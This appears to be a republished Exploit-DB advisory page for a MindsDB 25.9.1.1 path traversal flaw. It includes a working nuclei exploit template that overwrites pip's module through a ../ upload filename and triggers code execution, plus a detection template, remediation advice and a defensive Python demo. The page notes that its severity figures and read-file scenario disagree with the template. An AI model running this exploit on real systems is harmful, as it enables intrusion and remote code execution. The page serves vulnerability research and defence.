[webapps] MindsDB 25.9.1.1 - Path Traversal

CVE-2026-27483

MindsDB 25.9.1.1 contains a path traversal vulnerability that allows an unauthenticated attacker to read arbitrary files.

Critical · CVSS 9.1

📋 Vulnerability summary

CVE: CVE-2026-27483
Type: Path traversal
Affected versions: MindsDB 25.9.1.1 and possibly earlier
Severity: Critical · CVSS 9.1
Published: 2026-05-04
Submitted by: Lohitya Pushkar (thewhiteh4t)
Source: Exploit-DB original post

🔬 Root cause

The vulnerability stems from insufficient validation of user-supplied paths in file operations: sequences such as ../ let an attacker escape the intended directory and read arbitrary files. The original post does not name the affected function; flaws of this kind usually sit in file-handling endpoints such as /api/.../file/ handlers. Note that the exploit template on this page targets the multipart filename sent to the upload endpoint, PUT /api/files/<name>, so the unsanitised input there is the filename in the Content-Disposition header of the request body, not a URL path.

🎯 Attack scenario

1. Confirm that the MindsDB service is running and that the path of the target file is known.
2. Send an HTTP GET request containing a traversal sequence, for example GET /../../etc/passwd.
3. If the service does not filter the sequence, it returns the contents of the target file.
Success indicator: a sensitive file such as /etc/passwd is read. The request line above is a generic illustration; the exploit template on this page uses a different vector (the multipart filename of the upload endpoint) and writes a file rather than reading one.

💥 Impact

An attacker can read arbitrary files on the server without authorisation, including configuration files, source code and database credentials, which may lead to further privilege escalation or disclosure of sensitive information.

⚔️ Nuclei exploit template

The following is a nuclei v3 template for exploitation. Read what it actually does before using it, because it does not match the one-line summary above: instead of reading a file without authentication, it fingerprints the instance via GET /api/status, logs in through POST /api/login (credentials are needed when the status response reports http_auth_enabled: true), uploads a file through PUT /api/files/<name> whose multipart filename carries ../ sequences so that it lands on pip's __init__.py inside the server's virtualenv, and then calls POST /api/handlers/anomaly_detection/install, which runs pip and therefore imports the overwritten module. The traversal depth and the venv/python3.10 layout are assumptions baked into that filename; the write replaces a core module and is destructive, so run it only against a disposable, authorised target. Content-Length headers are omitted from the raw requests because nuclei computes them unless unsafe: true is set. The template's classification (cvss-score 7.5, severity high) also differs from the summary's Critical / CVSS 9.1; the page gives no basis for either figure, so check the advisory.

id: CVE-2026-27483-exploit

info:
  name: MindsDB 25.9.1.1 - Path Traversal via Upload Filename (write, then trigger)
  author: thewhiteh4t
  severity: high
  description: |
    MindsDB 25.9.1.1 is vulnerable to path traversal. This template assumes the
    multipart filename given to PUT /api/files/<name> is used unsanitised, writes
    a Python payload over pip's __init__.py inside the server's virtualenv, and
    then requests a handler install, which invokes pip and imports the
    overwritten module. The written path assumes the upload directory sits six
    levels below a "venv" that uses python3.10; adjust it for the target layout.
  reference:
    - https://github.com/mindsdb/mindsdb/security/advisories/GHSA-4894-xqv6-vrfq
  classification:
    cvss-score: 7.5
    cve-id: CVE-2026-27483
  tags: cve,cve2026,mindsdb,path-traversal,rce

variables:
  # Python source executed when the overwritten pip module is imported.
  # The file is imported as a module, so it must be valid Python, not a shell command.
  cmd: "import os; os.system('id')"
  # Supply credentials with -var username=... -var password=... when /api/status
  # reports http_auth_enabled: true; leave empty for unauthenticated instances.
  username: ""
  password: ""

http:
  - raw:
      - |
        GET /api/status HTTP/1.1
        Host: {{Hostname}}
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"mindsdb_version":'
      - type: status
        status:
          - 200
    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '"mindsdb_version":\s*"([^"]+)"'
        internal: true
        name: version
      - type: regex
        part: body
        group: 1
        regex:
          - '"auth":\s*\{\s*"http_auth_enabled":\s*(true|false)'
        internal: true
        name: auth_enabled

  - raw:
      - |
        POST /api/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Connection: close

        {"username":"{{username}}","password":"{{password}}"}

    matchers:
      - type: word
        part: body
        words:
          - '"token"'
    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '"token":\s*"([^"]+)"'
        name: token

  - raw:
      - |
        PUT /api/files/{{randstr}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}}
        Authorization: Bearer {{token}}
        Connection: close

        ------WebKitFormBoundary{{randstr}}
        Content-Disposition: form-data; name="name"

        {{randstr}}
        ------WebKitFormBoundary{{randstr}}
        Content-Disposition: form-data; name="source"

        {{randstr}}
        ------WebKitFormBoundary{{randstr}}
        Content-Disposition: form-data; name="source_type"

        file
        ------WebKitFormBoundary{{randstr}}
        Content-Disposition: form-data; name="file"; filename="../../../../../../venv/lib/python3.10/site-packages/pip/__init__.py"
        Content-Type: text/plain

        {{cmd}}
        ------WebKitFormBoundary{{randstr}}--

    matchers:
      - type: word
        part: body
        words:
          - '""'
        negative: true
      - type: status
        status:
          - 200
          - 201
          - 204
    matchers-condition: or

  - raw:
      - |
        POST /api/handlers/anomaly_detection/install HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Authorization: Bearer {{token}}
        Connection: close

        {}

    matchers:
      - type: word
        part: body
        words:
          - 'success'
      - type: status
        status:
          - 200
          - 201

🔍 Nuclei detection template

The following detection template identifies MindsDB instances and extracts the version they advertise. A match only means the target is MindsDB and reports a version; it does not exercise the traversal, so a version at or below 25.9.1.1 is an indicator, not proof. If you want a pass/fail result, nuclei's compare_versions DSL helper can turn the extracted value into a matcher.

id: CVE-2026-27483-detection

info:
  name: MindsDB 25.9.1.1 - Path Traversal Detection
  author: thewhiteh4t
  severity: high
  description: |
    MindsDB version 25.9.1.1 is vulnerable to path traversal.
    This check fingerprints MindsDB from /api/status and extracts the advertised
    version; compare it against 25.9.1.1 (that release and possibly earlier ones
    are listed as affected).
  reference:
    - https://github.com/mindsdb/mindsdb/security/advisories/GHSA-4894-xqv6-vrfq
  classification:
    cvss-score: 7.5
    cve-id: CVE-2026-27483
  tags: cve,cve2026,mindsdb,path-traversal,detection

http:
  - method: GET
    path:
      - '{{BaseURL}}/api/status'
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"mindsdb_version":'
      - type: status
        status:
          - 200
    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '"mindsdb_version":\s*"([^"]+)"'
        name: mindsdb_version

🛡️ Remediation

Upgrade to the latest MindsDB release. As interim measures, filter path traversal sequences (such as ../) at the reverse proxy and canonicalise and validate input on the file endpoints. Two caveats: a proxy rule that looks for the literal ../ in the URL misses percent-encoded forms and never sees the multipart filename field inside a request body, which is the vector the exploit template above uses; and normalising the string is not enough on its own, the server must resolve the final path (following symlinks) and confirm that it stays inside the intended directory.
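As an added worked example (not MindsDB's code and not from the original post), the following Python models the root cause described earlier on this page and the hardened check, and tests the interim "../" filter from the remediation advice against percent-encoded and doubled variants. The base directory, the file names, the symlink and the traversal inputs are all constructed for the demonstration; the function names are illustrative.

```python
"""Added example (not MindsDB code): the path-traversal root cause, the fix,
and why a substring filter for "../" is not a fix.

Two client-controlled inputs are modelled: a relative path given to a
file-read handler, and the multipart ``filename`` an upload handler writes to.
The vulnerable functions are deliberately wrong; the hardened ones show the
check a server should make before touching the filesystem.
"""
import os
import re
import tempfile
from urllib.parse import unquote


def vulnerable_resolve(base_dir: str, user_path: str) -> str:
    """Vulnerable: decode, join and trust. '../' walks up; an absolute path replaces base_dir."""
    return os.path.join(base_dir, unquote(user_path))


def resolve_under(base_dir: str, user_path: str) -> str:
    """Hardened: decode, canonicalise (symlinks included), then prove containment."""
    base_real = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base_real, unquote(user_path)))
    # commonpath compares whole components, so "files2" is never accepted for "files".
    if os.path.commonpath([base_real, candidate]) != base_real:
        raise PermissionError(f"{user_path!r} resolves outside {base_real}")
    return candidate


_SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$")


def safe_upload_name(filename: str) -> str:
    """Reduce a multipart Content-Disposition filename to one safe path component."""
    name = os.path.basename(unquote(filename).replace("\\", "/"))
    if name in (".", "..") or not _SAFE_NAME.match(name):
        raise ValueError(f"rejected upload name {filename!r}")
    return name


def escapes(base_dir: str, user_path: str) -> bool:
    """True when the vulnerable join ends up outside base_dir."""
    base_real = os.path.realpath(base_dir)
    target = os.path.realpath(vulnerable_resolve(base_dir, user_path))
    return os.path.commonpath([base_real, target]) != base_real


def naive_proxy_filter(raw_path: str) -> bool:
    """The interim mitigation many deploy: block the request if the literal '../' appears."""
    return "../" in raw_path


def strip_once(raw_path: str) -> str:
    """A 'sanitiser' that deletes '../' a single time; ....// survives it as ../ ."""
    return raw_path.replace("../", "")


def demo() -> dict:
    """Run the checks against constructed inputs; returns the results for inspection."""
    base = tempfile.mkdtemp(prefix="mindsdb-files-")  # constructed upload directory
    os.symlink("/etc", os.path.join(base, "evil"))     # symlink inside base, pointing out
    results = {}
    for p in ["reports/q1.csv", "../../etc/passwd", "/etc/passwd",
              "..%2f..%2fetc%2fpasswd", "evil/passwd"]:
        try:
            resolve_under(base, p)
            results[p] = "allowed"
        except PermissionError:
            results[p] = "blocked"
    results["filter:plain"] = naive_proxy_filter("../../etc/passwd")
    results["filter:encoded"] = naive_proxy_filter("..%2f..%2fetc%2fpasswd")
    results["strip_once"] = strip_once("....//....//etc/passwd")
    results["upload"] = safe_upload_name("report.csv")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key!r}: {value!r}")
```

demo() creates a temporary directory containing a symlink that points at /etc: a check based only on os.path.normpath would accept evil/passwd, which is why the hardened version resolves with os.path.realpath before comparing. The encoded input shows why the proxy substring rule is a weak stopgap, and the doubled input shows why "remove ../" is worse than rejecting the request outright.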

📎 References

https://github.com/mindsdb/mindsdb/security/advisories/GHSA-4894-xqv6-vrfq
⚠️ This article is based on public vulnerability databases and is intended for security research and defensive reference only. Generated: 2026-05-07 07:52 | Source: Exploit-DB

[!] CONTACT_CHANNELS

For business enquiries, technical consulting or vulnerability feedback, contact the author through the channel below.

> PING_AUTHOR (@A1RedTeam)